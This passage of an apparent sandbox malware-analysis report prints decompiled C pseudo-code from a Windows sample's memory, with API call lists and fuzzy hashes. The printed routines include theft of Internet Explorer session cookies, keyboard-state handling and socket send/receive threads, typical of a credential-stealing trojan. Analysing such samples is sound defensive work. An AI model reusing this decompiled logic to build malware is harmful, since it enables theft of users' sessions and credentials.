        					_t64 = _t64 + 0xc;
        					if(_v12 < 0xffffffff) {
        						continue;
        					}
        					break;
        				}
        				return _t35;
        			}

        APIs
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 00407893
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004078BD
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004078DA
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004078F0
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 0040791E
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 0040792F
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407A84
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead
        • String ID: rsldps
        • API String ID: 2080902951-2437408065
        • Opcode ID: 965b4134c26fd89abf1a72c78b937a70367ccf12d4deff2356b016d57dc73741
        • Instruction ID: b1bf638207e903b645526defd6a29bc71c8650272dbde28238e8b9422891b011
        • Opcode Fuzzy Hash: 965b4134c26fd89abf1a72c78b937a70367ccf12d4deff2356b016d57dc73741
        • Instruction Fuzzy Hash: A2318D71A04209EFDB218F49C885B6AB7F5FB40358F04817AE905A72E1D378FD90CB95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004135EC(signed int __eax, void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
        				short _v524;
        				short _v1044;
        				void* _t22;
        				int _t27;
        				void* _t28;
        				void* _t29;
        				signed int _t30;
        
        				_t29 = __edx;
        				_t28 = __ecx;
        				_t30 = __eax;
        				_t27 = 0;
        				if(GetTempPathW(0xf6,  &_v1044) - 1 <= 0xf5 && GetTempFileNameW( &_v1044, 0x4040c4, 0,  &_v524) > 0 && E00410093( &_v524) != 0) {
        					_t22 = E00411EB3( &_v524, _a4, _t30 & 0x00000001);
        					_t35 = _t22;
        					if(_t22 != 0) {
        						_t7 =  &_a8; // 0x405420
        						_t27 = E00413599(_t28, _t29, _t35,  &_v524, _a4,  *_t7);
        						E00410093( &_v524);
        					}
        				}
        				return _t27;
        			}

        APIs
        • GetTempPathW.KERNEL32(000000F6,?,00000000,00000000), ref: 00413607
        • GetTempFileNameW.KERNEL32(?,004040C4,00000000,?), ref: 00413629
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Temp$AttributesDeleteNamePath
        • String ID: T@
        • API String ID: 838033943-1862747698
        • Opcode ID: 344d52693c1aa942c6da1bed8c35175132627be7aa3e450a6626d149a5a71b63
        • Instruction ID: 7046ce65caec88e5304bbb8bb97487f4820e7ef8c706e4ca6e52ee9a632ac698
        • Opcode Fuzzy Hash: 344d52693c1aa942c6da1bed8c35175132627be7aa3e450a6626d149a5a71b63
        • Instruction Fuzzy Hash: C4014CB680021C7ADF20AFA0DC49FDB776CAB04349F0445A2BA54A7251D679DAC88B58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040C692(void* __ecx, void* __edx, void* __esi, char* _a4) {
        				long _v8;
        				int _t14;
        				char* _t23;
        
        				_push(__ecx);
        				if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
        					_t11 = _v8;
        					if(_v8 != 0) {
        						_t23 = E0040F14B(_t11);
        						if(_t23 != 0) {
        							_t14 = InternetGetCookieA(_a4, 0, _t23,  &_v8);
        							_t30 = _t14;
        							if(_t14 != 0) {
        								_push(_t23);
        								E0041352B(__ecx, __edx, _t30, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
        							}
        							E0040F15E(_t23);
        						}
        					}
        				}
        				E004053C0(0);
        				return E00404FFB();
        			}

        APIs
        • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040C6A2
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040C6C8
        Strings
        • %SIE session cookies:%S, xrefs: 0040C6D6
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CookieInternet$AllocateHeap
        • String ID: %SIE session cookies:%S
        • API String ID: 1720872598-348586552
        • Opcode ID: f8ce2fd62318af2e62050f072a0c79b576fa053a5e9c00a31dbaf52670bbc3c7
        • Instruction ID: dcbf455fdab095c16112c2c930d64b6f170e0d776b743c08c0d5513f8fd321a2
        • Opcode Fuzzy Hash: f8ce2fd62318af2e62050f072a0c79b576fa053a5e9c00a31dbaf52670bbc3c7
        • Instruction Fuzzy Hash: BAF08732100144FACB31BB67CC49DDF3E6DDEC2B80B00423AF804E6181EA7A9A41D6B8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004119F4(intOrPtr _a4, intOrPtr _a12) {
        				short _v524;
        				void* __edi;
        				int _t23;
        				intOrPtr _t24;
        
        				_t23 = 0;
        				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E00410093( &_v524) != 0) {
        					_t24 = _a4;
        					E0040F564(PathFindFileNameW( &_v524), _t24 + 3);
        					E0040F19A(_t24, "?T", 2);
        					 *((char*)(_t24 + 2)) = 0x5c;
        					_t23 = 1;
        				}
        				return _t23;
        			}

        APIs
        • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00411A16
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00411A3E
          • Part of subcall function 0040F564: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00411A4B,?,?), ref: 0040F577
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
        • String ID: cab
        • API String ID: 2491076439-1787492089
        • Opcode ID: 584a59f9107d50c2214ab54c276517151a8afbcef0b85f2018e8ab7dbd6b4b43
        • Instruction ID: c419cbc84e17439c421b978f46159d22011411f2eaf0fbcd87b47ffe840e8764
        • Opcode Fuzzy Hash: 584a59f9107d50c2214ab54c276517151a8afbcef0b85f2018e8ab7dbd6b4b43
        • Instruction Fuzzy Hash: 3DF0A476A0032467CB209BB5DC09FCB7BAC9F45784F004176BA55F3191DA78AA848AD4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E0040987D(void* __eax) {
        				void* __esi;
        				signed int _t10;
        				signed int* _t11;
        				signed int _t12;
        				signed int _t14;
        				signed int _t15;
        				void* _t16;
        				void* _t19;
        
        				_t19 = __eax;
        				if(__eax == 0) {
        					return __eax;
        				}
        				 *0x414ed8(0x414a14, _t16);
        				_t14 =  *0x414a0c; // 0x6f627965
        				_t12 = 0;
        				if(_t14 <= 0) {
        					L5:
        					if(_t12 + 1 == _t14) {
        						_t15 = _t14 - 1;
        						 *0x414a0c = _t15;
        						if(_t15 != 0) {
        							E0040F0F6(_t15 << 2, 0x414a10);
        						} else {
        							E0040F15E( *0x414a10);
        							 *0x414a10 =  *0x414a10 & 0x00000000;
        						}
        					}
        					return  *0x414edc(0x414a14);
        				} else {
        					goto L2;
        				}
        				do {
        					L2:
        					_t10 =  *0x414a10; // 0x53647261
        					_t11 = _t10 + _t12 * 4;
        					if( *_t11 == _t19) {
        						 *_t11 =  *_t11 & 0x00000000;
        					}
        					_t12 = _t12 + 1;
        				} while (_t12 < _t14);
        				goto L5;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(tate), ref: 0040988B
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 004098E3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: eyboardState
        • API String ID: 3168844106-1210060208
        • Opcode ID: ced525ba700356d831a76517460a23825368de5532171fdbe8248050f7809006
        • Instruction ID: 572f9b23131d28ea05163e59d5de067029f5390bc21249b7786d70767bda8585
        • Opcode Fuzzy Hash: ced525ba700356d831a76517460a23825368de5532171fdbe8248050f7809006
        • Instruction Fuzzy Hash: 06F0C832A601128BC729BB14F8105AA3365FFD2B55726C03BD40277BA2D7384C01575C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 15%
        			E00409492(void* __ecx, intOrPtr _a4) {
        				char _v5;
        
        				_t14 = __ecx;
        				_push(__ecx);
        				_push(2);
        				_push(1);
        				_push( &_v5);
        				_push(_a4);
        				if( *0x414cf0() == 1) {
        					if(_v5 == 5 || _v5 == 4) {
        						E004115DE(_a4, _t14);
        					} else {
        						E004092A5(_a4);
        					}
        				}
        				 *0x414a2c =  *0x414a2c - 1;
        				_push(0);
        				RtlExitUserThread();
        				return 0;
        			}

        APIs
        • recv.WS2_32(?,?,00000001,00000002), ref: 004094A1
        • RtlExitUserThread.NTDLL(00000000), ref: 004094D2
          • Part of subcall function 004092A5: send.WS2_32(?,00002710,00002710,00000000), ref: 00409348
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ExitThreadUserrecvsend
        • String ID: atorA
        • API String ID: 4259754606-3648288836
        • Opcode ID: f2645b3a3780e7ddadde299d05c2c41efa1bf60b03ae6f5d65ba5a2410d791d9
        • Instruction ID: f80ea95a38a115a291f7c1e786db8706766a393ee6238dab42e445f89a16c80d
        • Opcode Fuzzy Hash: f2645b3a3780e7ddadde299d05c2c41efa1bf60b03ae6f5d65ba5a2410d791d9
        • Instruction Fuzzy Hash: CDF0E5B0218208BFEB019BA0CC09F9E3B64EB01300F40C132F605A40E2C7FACD82878D
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • RtlEnterCriticalSection.NTDLL(tate), ref: 004097A9
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 004097D4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: eyboardState
        • API String ID: 3168844106-1210060208
        • Opcode ID: 53a2975af9596d4c70a16e5722e1b0be87ca42e4ce0f8e56fd7927d509260fa9
        • Instruction ID: 2053206ebe207e129efe7e5b98630a271c67ae1d48f85a524ab5b1a75baf01aa
        • Opcode Fuzzy Hash: 53a2975af9596d4c70a16e5722e1b0be87ca42e4ce0f8e56fd7927d509260fa9
        • Instruction Fuzzy Hash: 3AE0DF326A7100CBC6044F28AC805ABB339BAC2B0131D803BE012E7692C3788C41869D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E00409D36(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, char _a8) {
        				intOrPtr _t4;
        				int _t5;
        				intOrPtr _t8;
        				intOrPtr _t10;
        
        				_t10 = __edx;
        				_t8 = __ecx;
        				_t4 = 0x40220d;
        				if(__edx == 0) {
        					_t10 = 0x40220d;
        				}
        				if(_t8 == 0) {
        					_t8 = _t4;
        				}
        				if(_a4 != 0) {
        					_t4 = _a4;
        				}
        				_t3 =  &_a8; // 0x40220d
        				_t5 = wnsprintfA( *_t3, 0x103, "%s|%s|%s", _t4, _t8, _t10);
        				asm("sbb al, al");
        				return _t5 + 0xfffffffffffffffc;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: wnsprintf
        • String ID: "@$%s|%s|%s
        • API String ID: 167729887-1717862645
        • Opcode ID: 61a0b9dda64d5411add998814e7666225307bae45766fe68f3274c5548608a9c
        • Instruction ID: 80b69b96e8c423e1bf09e1a2d01e3bacc82d6d85d30929f6c5b32588fe51efd6
        • Opcode Fuzzy Hash: 61a0b9dda64d5411add998814e7666225307bae45766fe68f3274c5548608a9c
        • Instruction Fuzzy Hash: 7CE086707812016BEB185668CD59B7F2195DFE0704F14C53DB962AA2E2E778CC54C719
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412C8D() {
        				short _v524;
        				WCHAR** _t6;
        
        				E0040AE3C(0x4153a8);
        				_t6 =  *0x414ad4; // 0x241f5a8
        				PathCombineW( &_v524,  *_t6, _t6[1]);
        				PathCombineW(0x4153a8, 0x4153a8,  &_v524);
        				return 0x4153a8;
        			}

        APIs
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
        • PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$Combine$FolderSpecial
        • String ID: yNameW
        • API String ID: 2638848501-1413253154
        • Opcode ID: 70ef86ef876dd58c4ae2c14954fe5a8639fcb4aa71770df5c35ce9df31cf3eb8
        • Instruction ID: e8d3ca7cb42886c3d68fd82b6469ded5b7716b08c04af3e1d15b6de6e7007ad8
        • Opcode Fuzzy Hash: 70ef86ef876dd58c4ae2c14954fe5a8639fcb4aa71770df5c35ce9df31cf3eb8
        • Instruction Fuzzy Hash: A5E08636901228ABCB406794DC4CCCA7B6CDF85344B0180B1B914E3321DA74D955CBD9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E0040ECEA() {
        				intOrPtr _v0;
        				void* __esi;
        
        				 *0x414ed8(0x414f80);
        				if(E0040EBE3(_v0) != 0) {
        					E0040EC78(_t3, 0);
        				}
        				return  *0x414edc(0x414f80);
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040ECF1
        • RtlLeaveCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040ED10
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: urityDescriptorToAccessNamedA
        • API String ID: 3168844106-657014366
        • Opcode ID: 160245b17f58b9328896003184254241032bbd90a35072ab70045f2fa87f5015
        • Instruction ID: 7417f3e59bc3d2f83629a325cde0aa874c47eef3d368822d84efd257a25f333c
        • Opcode Fuzzy Hash: 160245b17f58b9328896003184254241032bbd90a35072ab70045f2fa87f5015
        • Instruction Fuzzy Hash: 29D0A73324421166D2102727AC0CFEF7D6CAFC17A0F09883BF104A61A4C7788472826C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 16%
        			E004063F9() {
        
        				 *0x414ed8(0x4147a4);
        				E0040F15E( *0x4147c4);
        				 *0x4147bc =  *0x4147bc & 0;
        				 *0x4147c4 =  *0x4147c4 & 0;
        				 *0x4147a0 = 0;
        				 *0x414edc(0x4147a4);
        				return 0;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(004147A4), ref: 00406400
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RtlLeaveCriticalSection.NTDLL(004147A4), ref: 00406426
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterFreeHeapLeave
        • String ID: MessageW
        • API String ID: 3296397286-511154193
        • Opcode ID: 40109aba409ec2952434b72fdffee511761230f64915fa97890a5c842d985bff
        • Instruction ID: 1d2f382544fb96352087c96c09e9d3298041424ba7a83dee8a4a2dab7bdcbfa9
        • Opcode Fuzzy Hash: 40109aba409ec2952434b72fdffee511761230f64915fa97890a5c842d985bff
        • Instruction Fuzzy Hash: 3BD09236831261DF87016BA4FC054D676A8FF86716315C17AE428911F0D77909908B9C
        Uniqueness

        Uniqueness Score: -1.00%